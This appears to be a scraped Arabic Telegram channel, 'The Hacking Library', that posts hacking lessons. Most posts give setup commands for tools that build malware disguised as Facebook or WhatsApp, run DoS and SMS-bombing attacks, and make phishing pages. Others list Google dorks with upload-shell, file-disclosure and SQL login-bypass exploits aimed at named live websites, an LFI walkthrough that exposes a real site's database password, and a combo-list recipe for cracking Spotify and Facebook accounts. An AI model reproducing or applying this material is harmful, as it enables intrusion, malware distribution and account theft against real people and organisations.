The Hacking Library
351 subscribers
874 photos
19 videos
44 files
1.3K links
محتوي القناه هو عباره عن تجميع
القناه عباره عن ارشيف للهكرز الأخلاقيات وغير الأخلاقيين
استمتعوا😀👍
Download Telegram
#الدرس_العاشر

السلام عليكم ورحمة الله وبركاته
اليوم سوف اشرح لكم طريقه صنع فايروس قوي
عبر أداة viruscreater


 طريقه تثبيتها:::-


الاوامر

1-  git clone https://github.com/ERROR4317/viruscreater

2-  cd viruscreater

أمر التشغيل


3- python2 virus.py



انا اخترت رقم 2

صناعه فيروسات قويه و ب انواع مختلفه



#CS
#الدرس_12
تم تحديث اداه payload5

هذا شرح أداه payload5 (5.9.9)
{رقم 1 تبع الميتاسبلويت فيها}
1 عمل بايلود للاندرويد
2عمل بايلود للويندوز
3 فتح جلسه على بايلود للاندرويد
4 فتح جلسه على بايلود للويندوز
5 اختراق عبر ip من خلال بورت 21
6 اختراق عبر ip من خلال بورت 445
7 فتح الرسائل والمكالمات التي اخذتها من الضحيه
8 فتح الصور والملفات الذي اخذتها من الضحيا
9 تحميل الميتاسبلويت
10 حل مشاكل الميتاسبلويت
11 تحميل الميتاسبلويت آخر إصدار 5.0.0
-------------------------------
{رقم 2 تبع الفحص}
1 فحص ip أو رابط موقع
2 إظهار جميع ip الاجهزه على الشبكه
3 لفحص ip عشوائي
4 لتحميل الاده nmap
-------------------------------
{رقم 3 تبع الهجوم(الدوس اتاك)}
1للهجوم على موقع
-------------------------------
{رقم 4تبع ngrok}
1 فتح http من النجرج
2 فتح tcp من النجرج
3 تحميل النجرج يجب الدخول للموقع لاحدار الكود
-------------------------------
{رقم5 تبع الفيروسات}
1 عمل فيروس عادي
2 عمل فيروس يشبه الفيس بوك
3-عمل فيروس شبه WhatsApp
4-عمل فيروس شبه الانستجرام
5-عمل فيروس شبه الماسنجر
6 فيروس إرسال رسائل مزعجه SMS لأي
شخص ببلاش
7 إرسال مكالمات مزعجه لأي أحد مجانيه
8-رفع الفيروس لكي تبعتو للضحيه
-------------------------------
{رقم 6 تبع Termux}
1 لتغير ثيم Termux باسمك
2 تحميل جميع الأدوات الاساسيه
3 لتغير ثيم ترميكس إلى ثيم الجمجمة
4 لتغير ثيم ترميكس إلى ثيم جمجمتين
-------------------------------
{رقم 7 تبع الفيس بك}
1 التخمين على باسورد الفيس بوك
2 اختراق متاح وفيسبوك عشوائي
3صنع صفحه مزوره للفيس بوك
---------------------------
{رقم 8 للتشفير }
1- تشفير ملف بايثن 1
2- تشفير ملف بايثن 2
--------------------------
30 لفتح حسابي الفيس بوك
--------------------------
40 لفتح قناتي YouTube
--------------------------
7777 لتفريغ مساحه في الهاتف
--------------------------
90 help

للتحديث قم بكتابه 99

تثبيت اداة Payload 5

pkg install git -y

git clone https://github.com/Ali898989/setupp

cd setupp

chmod +x setup.sh

./setup.sh


cd payload5


#CS
#الدرس_13
شرحي اليوم عن اداة vbug و هي طريقة سهلة لعمل فايروس مدمر للاجهزة
اول انا غير مسؤل تماما عن طريقة استخدامك لهذه الاداة
git clone https://github.com/Junior60/vbug
CD vbug
ls
chmod +x vbug
python2 vbug.py
كدا الاداة بتفتح معاك تقوم تختار رقم الذي يقابل نوع الجغهز اللي اتا عايز الفايروس من اجله بعداك نوع الفايروس e لاطبيقات ال apk بعداك
ls
 بتلقا الفايروس مع ملفات الاداة
بعداك تدي
cp اسم الفيروس /sdcard
عشان تنقله لزاكرة الجهاز طبعا لسا بكون في نسخة من الفايروس في ملفات الاداة تدي الامر
rm -rf اسم الفايورس
لمسحه
يلا الفايروس دا لو اديتو لي زول مجرد ما يعمل ليه تثبيت عليه العوض


الشرح مقدم من
#CS
الدورك

inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html



مثال موقع

http://kybloodcenter.org/hospital/wp...load/test.html
وهذا ايضا
http://celiaflores.net/wp-content/pl...load/test.html
==========================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
==========================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html

==========================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html

==========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html

==========================================
الدورك
: inurllugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php



#CS
احبائي واصدقائي الاعضاء الكرام
ثغرات ابلود ترفع شيل بصيغة صورة
وتكدر من خلال اضافة فايرفوكس لتحويل الصيغ
أكيد تعرفوها Live HTTP headers
ومكان نزول الشيل عليكم لين مدورت الصراحة
http://www.samysoft.net/fmm/fimnew/fwasel/1/101232.gif
الدورك
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html

مثال موقع
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
وهذا ايضا
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
============================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
============================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html

============================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html

===========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html

============================================
الدورك
: inurl:plugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php

============================================
http://i32.servimg.com/u/f32/12/32/61/62/74539610.gif
http://www.samysoft.net/fmm/fimnew/nehaya/99087634.gif

#CS
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
 ثغرة Local File Include

بسم الله الرحمن الرحيم
اخواني الكرام 
السلام عليكم و رحمة الله وبركاته 
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف:http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة

كود PHP: [عرض]

php://filter/convert.base64-encode/resource=index  


طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/تمام
او بإمكانك فك التشفير عن طريق الشيل !!! 
والمراد من فك التشفير هو الحصول على ملف الكونيفق 
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود

كود PHP: [عرض]

php://filter/convert.base64-encode/resource=config_inc  

الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة 
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom


#CS
##################################################
# Exploit Title: Wordpress woocommerce product options Upload Shell
# Google Dork :
# N/A
# Date: 16/05/2019
# Exploit Author: ArkealoGeNDz
# Tested on: Kali linux 2.0 / Mozilla Firefox
# Vulnerability : http://www.website.dz//woocommerce-product-options/includes/image-upload.php
# Use Burp Suite To Upload Shell
# Path Shell : /wp-content/plugins/woocommerce-product-options/uploads/numbers-letters/shell.php
# Path Shell 2 : /wp-content/uploads/2019/05/shell.php
##################################################
# Demo:

# https://www.pestamps.com/wp-content/plugins/woocommerce-product-options/uploads/3f59b09a5a/ArkealoGeNDz.png

# https://www.numerim.bzh/wp-content/plugins/woocommerce-product-options/uploads/92c7372df6/ArkealoGeNDz.png

# https://lvrparis.fr/wp-content/plugins/woocommerce-product-options/uploads/49dde56d2f/ArkealoGeNDz.png

# https://designmummy.com.au/wp-content/plugins/woocommerce-product-options/uploads/4a5eb89316/ArkealoGeNDz.png

#################################################
# Telegram: @ArkealoGeNDz
#################################################
الثغرة
 Local File Disclosure in wordpress theme Diarise


الدورك
 inurl:"wp-content/themes/diarise/"

الاستغلال

http://site.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ]

#CS
الدورك    intext:"ISPROJEK"


بعدها العثور علي لوحه التحكم


راح يكون اليوزر و الباس تبعهم


user: ' or 1=1 limit 1 -- -+

 password: ' or 1=1 limit 1 -- -+


الثاني



الدورك

filename:”wp-config.php” “define(‘DB_PASSWORD’,” extension:php






الدورك
inurl:"index.php?mnu=login"


الاستخدام

/ index.php?mnu=admin


الدورك

intext:"Powered by iyiWebSitesi"


الاستخدام

لوحه التحكم


testpage.com/admin
sql bypass
 id : = ' /*!or*/1=1#
pass : = ' /*!or*/1=1#


#cs
 ثغرة   PHPMiniAdmin 1.9 Database Open No-Secure Exploit


الدورك   

inurl:phpminiadmin.php


الاستغلال


https://site.com/salon/db/phpminiadmin.php



#CS
ثغرة ال
Joomla RSFirewall Components 2.11.25 Database and Password Disclosure


الدورك 
inurl:''/index.php?option=com_rsfirewall''


أو


 inurl:''/administrator/components/com_rsfirewall/'' intext:Hosted & Designed By Suryanandan.net


أو

intext:Designed by Artilabio



الاستغلال


ممكن نسحب اللسته تبع الباسورد

/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt


أو الوصول لقاعدة  البيانات

/administrator/components/com_rsfirewall/sql/mysql/configuration.data.sql

 /administrator/components/com_rsfirewall/sql/mysql/configuration.sql


/administrator/components/com_rsfirewall/sql/mysql/exceptions.sql


/administrator/components/com_rsfirewall/sql/mysql/feeds.data.sql


 /administrator/components/com_rsfirewall/

وغيرها من القواعد


مثال


www.ippbm.gov.my/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt



#CS
السلام عليكم ورحمة الله وبركاته

شرقي اليوم كيفيه  تكريك حسابات سبوتيفاي+فيسبوك+upaly+madiafire+fortnight+hule
  سهل جداا
سنتحتاج الي اداتين هما 
الاتشكر والكومبو البريفيت
 
اولا قم بفتح termux  

اولا علينا تثبيت أداة الكومبو وظيفتها  استخراج  كومبو من التيرمكس

اوامرها
 

pkg install php git -y



git clone https://github.com/Juni0r007/PasTerm.git



cd PasTerm

chmod +x *

php pasterm.php

راح تفتح معك الأداة

و بعدها
راح يطلب لك تكتب key word راح تنسخ
 الموجود بالأسفل و تلصقه علي termux

 
@gmail.com,@yahoo.com,@hotmail.com,@aol.com.@hotmail.co.uk,@hotmail.fr,@msn.com,@yahoo.fr,@wanadoo.fr,@orange.fr,@comcast.net,@yahoo.co.uk,@yahoo.com.br,@yahoo.co.in,@live.com


و بعدها راح يقول لك اكتب اسم لهذة اللسته
  انا كتبت saja

و بعدها راح يطلع لك مسار التم الاحتفاظ به

مثل هذا

/data/data/com.termux/files/home/saja.txt


كذا انتهينا من الأداة الاولي و تم استخراج للسته
 قويه من والكومبو


راح بندا الجزء الثاني و هو  تثبيت اداة اتشكر الاكونتات

 نفتح صفحه جديدة و نكتب الأوامر التاليه


 
1- rm -rif  PasTerm
apt update&&apt upgrade -y

2-termux-setup-storage

3- pkg install php git -y


4- git clone https://github.com/Juni0r007/AIOChk.git


5- ls


6- cd AIOChk


7- chmod +x *


8- php aio.php



و بعدها راح تشتغل الأداة
و راح نختار الرقم واحد

راح يطلب منك المساء الموجود به كومبو راح تكتب المسار الاعطتك ياه الأداة السابقه مثل هذا

/data/data/com.termux/files/home/saja.txt

 و بعدها راح يطلع لك مجموعه من الايميلات مع الباسورد تبعها

استمتعوووو

(شباب الشرح دا انا بريئه منكم لو في حد استخدمه بطريقه سيئه)


#CS
# اسم الثغرة : Joomla com_admin Components from V2.5.4 to V3.7.4
Database Backup Arbitrary File Download Vulnerability



# الدورك
   inurl:''/administrator/components/com_admin/sql/''
# نوع الثغرة   متوسطة
#################################################################################################

# مسار لوحه التحكم :

/administrator

#################################################################################################

# الاستغلالات  :



/joomla/administrator/components/com_admin/sql/others/mysql/......

/PATH/PATH/administrator/components/com_admin/sql/others/mysql/......

/PATH/administrator/components/com_admin/sql/updates/mysql/......

/administrator/components/com_admin/sql/updates/mysql/......

/administrator/components/com_admin/sql/updates/postgresql/.......

/administrator/components/com_admin/sql/updates/sqlazure/......

/administrator/components/com_admin/sql/updates/mysql/2.5.4-[YEAR]-[MONTH]-[DAY].sql

/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-19.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql

/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql

/PATH/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-[YEAR]-[MONTH]-[DAY].sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-18.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-19.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.6.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.[THIS-NUMBER-CHANGES-].sql

#################################################################################################

# أمثلة لمواقع مصابة  =>

[+]
xpilot-ai.org/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql

[+]



#CS
الاسم : SO-AT Solution CMS Bypass SQL Login


الدورك  inurl:/coop/re_register.php


الاستغلال


/coop/adminlogon.php



User: ' or 1=1 limit 1 -- -+
Password: ' or 1=1 limit 1 -- -+



أمثلة

 http://healthcoop.or.th/coop/adminlogon.php



 http://www.tot-coop.com/coop/adminlogon.php



#CS
الاسم    Server Info

الدورك

inurl:"debug/default/view?panel=config"


راح تطلع لك مواقع كثيرة

مجرد ما تدخل لها راح يعطيك معلومات
وايضا اسم المستخدم وكلمة المرور

#CS
ثغرة  (FTP2FTP ( Arbitrary File Download :
الدورك  
: inurl:/download2.php?id=

الاستغلال


http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php

مثال


http://www.supersat.cz/download/azbox/download2.php?id=23

after exploit :

http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================



#CS
السلام عليكم ورحمة الله وبركاته
شرحي اليوم شوي بسيط
وهو تحميل مقطع من الفيس بوك

عن طريق أداة Facebook-Video-Downloader


الأوامر


git clone https://github.com/Tuhinshubhra/Facebook-Video-Downloader

cd Facebook-Video-Downloader

php fb.php

enter URL for example (https://www.facebook.com/cctvcom/videos/1410869539034155/)

بعدها ح يطلب اسم للملف حقك
مثلا انا اخترت rubics



#CS
السلام عليكم ورحمة الله وبركاته
أداة TM-scanner رائعه تحتوي الكثير من الأدوات و طريقه استخدمها

الأوامر


git clone https://github.com/TechnicalMujeeb/TM-scanner

cd TM-scanner

chmod +x * sh install.sh

python2 tmscanner.py


#CS